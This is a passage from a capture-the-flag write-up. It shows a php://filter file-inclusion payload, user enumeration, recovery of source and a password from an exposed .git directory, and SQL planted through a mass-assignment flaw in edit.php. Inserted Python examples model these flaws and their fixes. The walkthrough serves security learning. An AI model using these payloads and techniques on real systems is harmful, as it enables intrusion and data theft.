Looking at the admin/quotes route we can see a collection for HomeQuotes that contains an audio record.

MeteorMiner shows us a lot, but we need to use the JavaScript console in order to view collection contents.

In Chrome, Ctrl + Shift + I will open the console for you. From here we can use the Meteor library itself to access data by typing HomeQuotes.find().fetch()

Another MP3 for our trouble.

http://ads.northpolewonderland.com/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3

https://techanarchy.net/assets/images/2016/12/discombobulatedaudio5.mp3

This is similar in principle to the debug server in terms of our approach. From the XML file we recovered from the apk we know that there is a PHP page named exception.php, and when we load this page in a browser we are told "Request method must be POST". Back to Postman.

Create a POST to http://ex.northpolewonderland.com/exception.php and send it:

Content type must be: application/json

OK, set a Content-Type header to application/json and send again:

POST contains invalid JSON!

Fair enough, let's add a blank JSON object in the body and send again:

Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.

OK, let's do as it says: {"operation":"WriteCrashDump"}

Fatal error! JSON key 'data' must be set.

Keep doing as it says: {"operation":"WriteCrashDump", "data":"merryxmas"}

{ "success" : true, "folder" : "docs", "crashdump" : "crashdump-AMnahP.php" }

That looks better; let's see what's on this page. It seems to have printed out whatever I put in the data field. From here I kind of tunnel visioned for a bit, believing there was a way to use this to execute code on the box.

We had another option for the operation at the beginning, ReadCrashDump. Let's see what this one does.

{"operation":"ReadCrashDump", "data":"merryxmas"}

Fatal error! JSON key 'crashdump' must be set.

OK, let's set that key, assuming crashdump should reference an existing crashdump to read: {"operation":"ReadCrashDump", "data":"merryxmas", "crashdump":"crashdump-AMnahP.php"}

Fatal error! JSON key 'crashdump' must be set.

Let's try putting crashdump into data: {"operation":"ReadCrashDump", "data":{"crashdump":"crashdump-AMnahP.php"}}

Fatal error! crashdump value duplicate '.php' extension detected.

And remove the extension: {"operation":"ReadCrashDump", "data":{"crashdump":"crashdump-AMnahP"}}

"merryxmas"

Great, we were able to read back the contents of the file from our original POST. I started going after some standard files like passwd, shadow etc. and I was getting nothing. I was trying to read the source for the exception.php page when I remembered something I saw in the North Pole. Sugarplum Mary was talking about PHP filters and local file inclusion attacks. She links to a blog post that's probably going to help us.

Let's try reading the exception.php page again, remembering that it adds the .php extension on. This is our new request:

{"operation":"ReadCrashDump", "data":{"crashdump": "php://filter/convert.base64-encode/resource=exception"}}

Success: we are greeted with a chunk of base64 that decodes to the source code for exception.php.

```php
<?php

# Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

# Code from http://thisinterestsme.com/receiving-json-post-data-via-php/

# Make sure that it is a POST request.
if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
    die("Request method must be POST\n");
}

# Make sure that the content type of the POST request has been set to application/json
$contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
if(strcasecmp($contentType, 'application/json') != 0){
    die("Content type must be: application/json\n");
}

# Grab the raw POST. Necessary for JSON in particular.
$content = file_get_contents("php://input");
$obj = json_decode($content, true);

# If json_decode failed, the JSON is invalid.
if(!is_array($obj)){
    die("POST contains invalid JSON!\n");
}

# Process the JSON.
if ( ! isset( $obj['operation']) or (
    $obj['operation'] !== "WriteCrashDump" and
    $obj['operation'] !== "ReadCrashDump")) {
    die("Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.\n");
}

if ( isset($obj['data'])) {
    if ($obj['operation'] === "WriteCrashDump") {
        # Write a new crash dump to disk
        processCrashDump($obj['data']);
    }
    elseif ($obj['operation'] === "ReadCrashDump") {
        # Read a crash dump back from disk
        readCrashdump($obj['data']);
    }
}
else {
    # data key unset
    die("Fatal error! JSON key 'data' must be set.\n");
}

function processCrashdump($crashdump) {
    $basepath = "/var/www/html/docs/";
    $outputfilename = tempnam($basepath, "crashdump-");
    unlink($outputfilename);
    $outputfilename = $outputfilename . ".php";
    $basename = basename($outputfilename);

    $crashdump_encoded = "<?php print('" . json_encode($crashdump, JSON_PRETTY_PRINT) . "');";
    file_put_contents($outputfilename, $crashdump_encoded);

    print <<<END
{
    "success" : true,
    "folder" : "docs",
    "crashdump" : "$basename"
}
END;
}

function readCrashdump($requestedCrashdump) {
    $basepath = "/var/www/html/docs/";
    chdir($basepath);

    if ( ! isset($requestedCrashdump['crashdump'])) {
        die("Fatal error! JSON key 'crashdump' must be set.\n");
    }

    if ( substr(strrchr($requestedCrashdump['crashdump'], "."), 1) === "php" ) {
        die("Fatal error! crashdump value duplicate '.php' extension detected.\n");
    }
    else {
        require($requestedCrashdump['crashdump'] . '.php');
    }
}
?>
```

And right at the top of the page, a link to our next mp3.

http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3

https://techanarchy.net/assets/images/2016/12/discombobulated-audio-6-XyzE3N9YqKNH.mp3
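The reason the `php://filter` value in the request above sailed past the extension check in readCrashdump, modelled in Python as an added example (not the challenge's or the author's code): `original_check_accepts` mirrors the PHP's "text after the last dot" test, and `hardened_resolve` is an assumed replacement that only accepts names of the shape tempnam() actually generates and keeps the resolved path inside the docs directory.

```python
"""Model of the readCrashDump extension check from exception.php, with a hardened version.

Added example, not code from the challenge or the author. The PHP check is
re-implemented here so its behaviour can be reasoned about offline; the
hardened resolver is an assumed design, not something the server provides.
"""
import os
import re
from typing import List, Optional, Tuple

# $basepath from the recovered exception.php
DOCS_DIR = "/var/www/html/docs"


def original_check_accepts(crashdump: str) -> bool:
    """Mirror of: if (substr(strrchr($s, "."), 1) === "php") die(...)

    Only the text after the LAST dot is compared, and only against "php".
    A value with no dot, or whose last dot is followed by anything else,
    is accepted unchanged.
    """
    dot = crashdump.rfind(".")
    ext = "" if dot == -1 else crashdump[dot + 1:]
    return ext != "php"


def original_require_target(crashdump: str) -> str:
    """What the PHP hands to require(): the value with '.php' appended."""
    return crashdump + ".php"


# tempnam($basepath, "crashdump-") yields the prefix plus six random
# alphanumerics, e.g. crashdump-AMnahP (the name seen on the page).
CRASHDUMP_NAME = re.compile(r"crashdump-[A-Za-z0-9]{6}")


def hardened_resolve(crashdump: str, docs_dir: str = DOCS_DIR) -> Optional[str]:
    """Return the absolute path to load, or None if the value is rejected.

    Two layers: the value must match the generator's pattern exactly, which
    leaves no room for stream wrappers, directory separators or dots; and the
    resolved path must still lie inside docs_dir. Existence is left to the
    caller, so this function never touches the filesystem.
    """
    if not CRASHDUMP_NAME.fullmatch(crashdump):
        return None
    root = os.path.realpath(docs_dir)
    candidate = os.path.realpath(os.path.join(root, crashdump + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def compare(values: List[str]) -> List[Tuple[str, bool, Optional[str]]]:
    """(value, original accepts?, hardened resolves to) for each input."""
    return [(v, original_check_accepts(v), hardened_resolve(v)) for v in values]


if __name__ == "__main__":
    # Constructed inputs: the name from the page, the same with .php, the
    # filter wrapper from the page, and a relative path.
    for value, orig, hard in compare([
        "crashdump-AMnahP",
        "crashdump-AMnahP.php",
        "php://filter/convert.base64-encode/resource=exception",
        "../index",
    ]):
        print(f"{value!r}: original={'accept' if orig else 'reject'} "
              f"hardened={hard or 'reject'}")
```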

We are told there is another audio file on the analytics site that we need to collect after logging in.

After logging in with the guest account, as well as the mp3 there are some options to query data from one of two analytics sets: Launch and Usage. We also have the option to save these queries as reports.

The obvious thing to try here is SQL injection. I try some basic injection techniques but nothing seems to work; I even get heavy handed and throw sqlmap at it, with no luck.

What about trying to log on as another user? Fortunately it is really easy to enumerate users from the login page. If a user doesn't exist we are presented with:

{"result":401,"msg":"No such user!"}

And if we find a valid user with an incorrect password we get:

{"result":401,"msg":"Bad password!"}

This lets us figure out there is an 'administrator' account, but we don't know the password for it. After trying some words that had been picked up through the other challenges nothing was working, and I was contemplating a brute force attack with hydra, especially as the response is easy to read. Before I did this I was reading back through the notes I had been making to see if I had missed something; turns out I had.

The first thing I would do on each IP was to run an nmap scan, and the nmap scan had returned an interesting item I had completely overlooked.

```
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA)
|   2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA)
|_  256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA)
443/tcp open  ssl/http nginx 1.6.2
| http-git:
|   104.198.252.157:443/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Finishing touches (style, css, etc)
| http-methods:
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.6.2
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php
```

nmap had found a Git repository. We can use wget to pull down all the files:

```
wget -r --no-parent https://analytics.northpolewonderland.com/.git/
```

which gives us:

```
Downloaded: 314 files, 1003K in 0.8s (1.25 MB/s)
```

With the .git folder pulled down, I clean up after wget by removing all the generated index.html pages.

```
root@kali:~# cd analytics.northpolewonderland.com/.git
root@kali:~/analytics.northpolewonderland.com/.git# find . -name index.html -exec rm {} +
```

As this is a git repo, let's see if we can read the git log.

Yes we can, and that's a lot of information.

```
root@kali:~/analytics.northpolewonderland.com/.git# git log
commit 16ae0cbe2630a87c0470b9a864bf048e813826db
Author: me <me@example.org>
Date:   Fri Dec 2 19:42:15 2016 +0000

    Finishing touches (style, css, etc)

commit 106079e728c97ebea387042a2e076fab62952e1e
Author: me <me@example.org>
Date:   Tue Nov 22 17:51:52 2016 -0800

    Got rid of mysqli_fetch_all(), which isn't widely supported

commit e46b41e391ee0e9f4afab7880982501ac1471fb4
Author: me <me@example.org>
Date:   Mon Nov 21 21:19:11 2016 -0800

    HTML escape more output values on the test page

commit 935d79726e13ab65c3b5baa4d925de86059057d4
Author: me <me@example.org>
Date:   Mon Nov 21 21:18:49 2016 -0800

    HTML escape an output value on the test page

commit 62547860f9a6e0f3a3bdfd3f9b14fea3ac7f7c31
Author: me <me@example.org>
Date:   Mon Nov 21 21:15:08 2016 -0800

    Fix database dump

commit 85a4207c178fa0f9c6b6bb77a6d42eac487159c0
Author: me <me@example.org>
Date:   Mon Nov 21 21:14:36 2016 -0800

    Saved queries now save the query object instead of the results

commit 45edadc1850c3894ab8850d1d77dca9a074a3a6a
Author: me <me@example.org>
Date:   Mon Nov 21 20:50:40 2016 -0800

    Update README.md to reflect the actual current state

commit 885ec6a4e870ce983aecde3a4f0e398b6a76615f
Author: me <me@example.org>
Date:   Mon Nov 21 20:49:23 2016 -0800

    Update report.php to log actual data to the database instead of static strings

commit 58c900fd53fced0d588e00e23c26cb8465eed498
Author: me <me@example.org>
Date:   Fri Nov 18 22:35:53 2016 -0800

    Add view.php

commit 43970092ea851cff05e44aba3e0a67eb351304f3
Author: me <me@example.org>
Date:   Fri Nov 18 22:20:08 2016 -0800

    Remove unnecessary data from the database dump

commit 1908b71d42bce15345cabb7a63f57b5c79b85d15
Author: me <me@example.org>
Date:   Fri Nov 18 22:19:21 2016 -0800

    Update the database dump

commit 0778ac7de1d7ff8ae46ebabdee33a340ab9506f3
Author: me <me@example.org>
Date:   Fri Nov 18 22:10:10 2016 -0800

    Reports can now be saved

commit 1562064538562f077d388044e344e3c2d85450d7
Author: me <me@example.org>
Date:   Fri Nov 18 21:39:30 2016 -0800

    Add a fairly complex query page for looking up records

commit 259d406f3f2345b50338d54a53efa36dd08f6f20
Author: me <me@example.org>
Date:   Fri Nov 18 19:51:47 2016 -0800

    Add a header, a footer, and a logout page

commit 2689a45ab9c38d92675660b9113fc173a0ccf129
Author: me <me@example.org>
Date:   Mon Nov 14 20:34:42 2016 -0800

    Fix the database dump

commit cf5f27b161f53d62f97ad6ebc648701288a2ea89
Author: me <me@example.org>
Date:   Mon Nov 14 20:33:27 2016 -0800

    Change the database and application/test script to use the real field names instead of fake names

commit 6ab9fe6ec3de2e28b79108ff5110643e9ba32478
Author: me <me@example.org>
Date:   Sun Nov 13 21:13:20 2016 -0800

    Add login to the HTML side of things

commit 02e8d14ffa8910bfd5365ff36eb96bcd7efc4409
Author: me <me@example.org>
Date:   Sun Nov 13 20:27:31 2016 -0800

    Add a HTML login page, and refactor a little to make check_user() usable by both JSON and HTML

commit f0d28ed3cc39538a6c415789408ef3f24ded959c
Author: me <me@example.org>
Date:   Sun Nov 13 20:06:13 2016 -0800

    Move some functions into this_is_json.php

commit d9636a3d648e617fcb92055dea63ac2469f67c84
Author: me <me@example.org>
Date:   Sun Nov 13 19:22:22 2016 -0800

    Small authentication fix

commit 5f0c135e1479d865945577c0a70d0cf39e49cdc7
Author: me <me@example.org>
Date:   Sun Nov 13 19:19:32 2016 -0800

    Add authentication

commit 420f433fe33d14abac5c3a588c3e753d0d71d50d
Author: me <me@example.org>
Date:   Sun Nov 13 18:37:10 2016 -0800

    Add some basic write-to-the-database functionality

commit bb2646691fc9f6bf5f1a0ade746b28f8147ffa48
Author: me <me@example.org>
Date:   Sun Nov 13 18:25:23 2016 -0800

    Add a bit of database functionality

commit 1057b70e7681f44aac2789e26a2b714327d8c203
Author: me <me@example.org>
Date:   Sun Nov 13 18:11:31 2016 -0800

    Add a script to test the API

commit d63a7e0df35ad525fa40eceae67be5b27215ece8
Author: me <me@example.org>
Date:   Sun Nov 13 18:10:45 2016 -0800

    Added the start of a reporting page
```

But we still don't have any source code, which is what I really want so I can find the final audio file.

I can't check out a branch; git complains about a work tree. Looking at all the contents of the folder we have, we can see an objects directory that contains a lot of files with seemingly random data. As it turns out these are git objects: every time a file is created or modified it gets an object file which contains the content of the file and some metadata. Even better for us, there are ways to recover the data if all we have is the objects directory.

We initialize an empty git repository, copy in our objects directory, use git's built-in repair functionality, then check out a branch by its commit hash.

```
thehermit@TECHANARCHY:~$ mkdir tempgit
thehermit@TECHANARCHY:~$ cd tempgit
thehermit@TECHANARCHY:~/tempgit$ git init
Initialised empty Git repository in /home/thehermit/tempgit/.git/
thehermit@TECHANARCHY:~/tempgit$ cd .git
thehermit@TECHANARCHY:~/tempgit/.git$ cp -R ../../analytics.northpolewonderland.com/.git/objects .
thehermit@TECHANARCHY:~/tempgit/.git$ cd ..
thehermit@TECHANARCHY:~/tempgit$ git fsck --full
notice: HEAD points to an unborn branch (master)
Checking object directories: 100% (256/256), done.
notice: No default references
dangling commit 16ae0cbe2630a87c0470b9a864bf048e813826db
dangling blob 7b9389b70b24166f782b755d960c7b017f78719d
thehermit@TECHANARCHY:~/tempgit$ git checkout 16ae0cbe2630a87c0470b9a864bf048e813826db
Note: checking out '16ae0cbe2630a87c0470b9a864bf048e813826db'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b new_branch_name

HEAD is now at 16ae0cb... Finishing touches (style, css, etc)
thehermit@TECHANARCHY:~/tempgit$ ls
crypto.php  edit.php    getaudio.php  js          mp3.php    report.php    this_is_html.php  view.php
css         fonts       header.php    login.php   query.php  sprusage.sql  this_is_json.php
db.php      footer.php  index.php     logout.php  README.md  test          uuid.php
thehermit@TECHANARCHY:~/tempgit$
```

Now we can see the source for all the files, including an SQL file. Checking the file we can see the schema for all the tables, including an audio table.

```sql
DROP TABLE IF EXISTS `audio`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `audio` (
  `id` varchar(36) NOT NULL,
  `username` varchar(32) NOT NULL,
  `filename` varchar(32) NOT NULL,
  `mp3` MEDIUMBLOB NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
```

Sadly the sprusage.sql file only contains the database schema; it doesn't contain any of the table data. Or at least it doesn't now. One of the commits we saw in the git history was 'Remove unnecessary data from the database dump'. We can jump to the repository at a commit before this point and see what the file contained then.

```
git checkout 1908b71d42bce15345cabb7a63f57b5c79b85d15
```

The audio table did not exist at this point in the repo, but we did find the administrator account.

```sql
--
-- Dumping data for table `users`
--

LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67');
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
```

Which still works :)

After logging in with the administrator account we notice the MP3 link we had before is now replaced with an Edit link. Fortunately we have the source for all these pages, so we don't need to stumble around. (Make sure to check out the latest commit of the repository first.)

Checking the 'getaudio' and 'mp3' PHP files, it seems they are pretty well locked down to only handing out the guest MP3 file. All the PHP files seem to be secure against SQL injection, which matches my previous experience. So let's have a look at our new edit.php file.

On the surface of things it looks pretty simple. It lets us update the Name and Description for any stored report. We can confirm this by running a query and saving the report and then using the edit page with the report ID we just generated.

But how does this help us?

When you take a closer look at the PHP page and its output, you notice that the new SQL values are not being set by name. It's a for loop iterating over the GET parameters and checking whether each one is a valid column name. Name and description are valid, so they are updated, but it is also checking for a field called query, which is not included in the HTML form. Let's create a new request that contains something in this query field.

Worth a shot. https://analytics.northpolewonderland.com/edit.php?id=f73d5f04-ebca-439c-822a-4ad1214803e3&name=a&description=b&query=SELECT * FROM audio

The output suggests that the update was successful.

```
Checking for id... Yup!
Checking for name... Yup!
Checking for description... Yup!
Checking for query... Yup!
UPDATE `reports` SET `id`='f73d5f04-ebca-439c-822a-4ad1214803e3', `name`='a', `description`='b', `query`='SELECT * FROM audio' WHERE `id`='f73d5f04-ebca-439c-822a-4ad1214803e3'Update complete!
```

But how do we view the results of our query? Let's take a look at the report page using the View query: https://analytics.northpolewonderland.com/view.php?id=f73d5f04-ebca-439c-822a-4ad1214803e3

And there is the output from our query.
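The weakness is that edit.php decides what to update by matching every submitted parameter against the table's full column list, rather than against the short list of fields the form is meant to change. The Python below is an added illustration (not the challenge's PHP) that reproduces that decision over a constructed SQLite copy of the `reports` and `audio` tables, then runs the stored query the way view.php does. Passing `REPORT_COLUMNS` mirrors the vulnerable loop; passing `EDITABLE_COLUMNS` is the fix: an explicit allow-list of user-editable fields, with column names still taken only from a fixed tuple and values bound as parameters. Table contents and the report id are constructed.

```python
import sqlite3

# Added example, not the challenge's edit.php: the same "accept any parameter
# that is a real column" decision, over a constructed in-memory copy of the tables.

# Every column of the reports table, as edit.php learns them from the schema.
REPORT_COLUMNS = ("id", "name", "description", "query")
# The only columns the edit form is meant to change.
EDITABLE_COLUMNS = ("name", "description")


def setup_db():
    """Constructed sample data: two audio rows, one report restricted to the guest track."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE reports (id TEXT PRIMARY KEY, name TEXT, description TEXT, query TEXT);
        CREATE TABLE audio (id TEXT PRIMARY KEY, username TEXT, filename TEXT, mp3 BLOB);
        INSERT INTO audio VALUES ('a1', 'guest', 'guest.mp3', X'494433');
        INSERT INTO audio VALUES ('a2', 'administrator', 'admin.mp3', X'494433');
    """)
    conn.execute("INSERT INTO reports VALUES (?, ?, ?, ?)",
                 ("r1", "orig", "orig", "SELECT username FROM audio WHERE username = 'guest'"))
    return conn


def apply_edit(conn, params, allowed):
    """Build and run the UPDATE for an edit request.

    `allowed` is the set of parameter names the handler will honour. Passing
    REPORT_COLUMNS reproduces the weak loop (any real column, including `query`);
    passing EDITABLE_COLUMNS is the fix. Column names only ever come from these
    fixed tuples and values are bound as parameters, so the SQL text itself is safe.
    Returns the sorted list of columns that were updated.
    """
    accepted = {k: v for k, v in params.items() if k in allowed}
    if not accepted:
        return []
    assignments = ", ".join(f"`{col}` = ?" for col in accepted)
    conn.execute(f"UPDATE `reports` SET {assignments} WHERE `id` = ?",
                 [*accepted.values(), params["id"]])
    return sorted(accepted)


def run_report(conn, report_id):
    """view.php's behaviour: execute whatever query the report row holds."""
    (query,) = conn.execute("SELECT query FROM reports WHERE id = ?", (report_id,)).fetchone()
    return conn.execute(query).fetchall()


def demo(allowed):
    """Submit the form's fields plus an extra `query` parameter, then view the report."""
    conn = setup_db()
    params = {"id": "r1", "name": "a", "description": "b",
              "query": "SELECT username, filename FROM audio"}   # not in the HTML form
    updated = apply_edit(conn, params, allowed)
    return updated, run_report(conn, "r1")


if __name__ == "__main__":
    print("weak loop:  ", demo(REPORT_COLUMNS))
    print("allow-list: ", demo(EDITABLE_COLUMNS))
```

The second design point, separate from the allow-list, is that a report's `query` column is executed verbatim by the viewer, so any path that lets a user write that column is equivalent to handing them a SQL console; checking which parameters can reach a column that later gets executed is the review question to ask of every update handler.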

We can tell from the SQL file that the MP3 is stored as a blob in the database itself, not as a file on disk, and we know that we can't get our MP3 using the getaudio function as that's locked to the guest track. My first thought was to use INTO OUTFILE, but that function doesn't seem to be enabled or working.

After reading up on exporting data from MySQL I found a function that might help: TO_BASE64(), which does what it says on the tin and displays the column as base64 data.

With this in hand we create a new query.

```sql
SELECT username,filename,TO_BASE64(mp3) from audio
```

https://analytics.northpolewonderland.com/edit.php?id=f73d5f04-ebca-439c-822a-4ad1214803e3&name=a&description=b&query=SELECT%20username,filename,TO_BASE64(mp3)%20from%20audi
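Once the base64 text is on the page it still has to be turned back into a file and checked. The following added Python (not from the writeup) decodes TO_BASE64() output, which MySQL wraps at 76 characters, and confirms the result is plausibly an MP3 by skipping any ID3v2 tag (its size is four 7-bit "syncsafe" bytes) and looking for the MPEG frame sync. The sample bytes and the encoded text built from them are constructed.

```python
import base64

# Added example, not the writeup's code: turn TO_BASE64() output copied from the
# report page back into bytes and check it is plausibly an MP3 before saving it.


def decode_column(text):
    """MySQL's TO_BASE64() wraps output at 76 characters; strip all whitespace
    before decoding, and reject anything that is not clean base64 (e.g. stray HTML)."""
    return base64.b64decode("".join(text.split()), validate=True)


def id3v2_tag_size(data):
    """Bytes occupied by an ID3v2 header plus tag, or 0 if there is none.
    The size is four 'syncsafe' bytes: 7 bits each, high bit always clear."""
    if len(data) < 10 or data[:3] != b"ID3":
        return 0
    size = 0
    for b in data[6:10]:
        size = (size << 7) | (b & 0x7F)
    return 10 + size


def looks_like_mp3(data):
    """True if an MPEG frame sync (11 set bits) follows the optional ID3v2 tag."""
    offset = id3v2_tag_size(data)
    return (len(data) >= offset + 2
            and data[offset] == 0xFF
            and (data[offset + 1] & 0xE0) == 0xE0)


# Constructed sample: a 5-byte ID3v2.3 tag followed by an MPEG frame header and padding.
SAMPLE_MP3 = (b"ID3\x03\x00\x00" + b"\x00\x00\x00\x05" + b"\x00" * 5
              + b"\xff\xfb\x90\x00" + b"\x00" * 100)
# base64.encodebytes wraps at 76 columns, the same shape as TO_BASE64() output.
SAMPLE_OUTPUT = base64.encodebytes(SAMPLE_MP3).decode()


def recover(text, path=None):
    """Decode one column value; optionally write it out if it passes the MP3 check.
    Returns (passed_check, decoded_length)."""
    data = decode_column(text)
    ok = looks_like_mp3(data)
    if ok and path:
        with open(path, "wb") as fh:
            fh.write(data)
    return ok, len(data)


if __name__ == "__main__":
    print(recover(SAMPLE_OUTPUT))
```

A decode that succeeds but fails the header check usually means the copied text was cut off or the page collapsed part of it, so compare the decoded length against the blob size in the database before trusting the file.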